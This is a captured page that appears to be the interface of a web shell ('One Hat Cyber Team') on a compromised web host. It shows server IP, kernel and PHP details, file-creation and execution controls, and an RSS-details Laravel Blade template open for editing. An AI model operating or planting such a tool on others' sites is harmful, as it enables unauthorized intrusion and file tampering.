⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.140
Server IP:
68.65.123.197
Server:
Linux premium49.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
smarbgfw
/
www
/
updater
/
resources
/
views
/
front
/
Edit File: rss-details.blade.php
@extends("front.$version.layout") @section('pagename') - {{convertUtf8($post->title)}} @endsection @section('breadcrumb-title', convertUtf8($bs->rss_details_title)) @section('breadcrumb-subtitle', strlen($post->title) > 30 ? mb_substr($post->title, 0, 30, 'utf-8') . '...' : $post->title) @section('breadcrumb-link', __('RSS Feed Details')) @section('content')
{{date('F d, Y', strtotime($post->created_at))}} - {{__('BY')}} {{$post->category->feed_name}}
{{convertUtf8($post->title)}}
{!! convertUtf8($post->description) !!}
{{$post->category->read_more_button}}
{{__('Share')}}
{{__('Tweet')}}
{{__('Linkedin')}}
{{__('Categories')}}
@foreach ($categories as $key => $rcat)
{{convertUtf8($rcat->feed_name)}}
@endforeach
{{__('SUBSCRIBE')}}
{{__('SUBSCRIBE FOR NEWSLETTER')}}
@csrf
@endsection @section('scripts') @if($bs->is_disqus == 1) {!! $bs->disqus_script !!} @endif @endsection
Simpan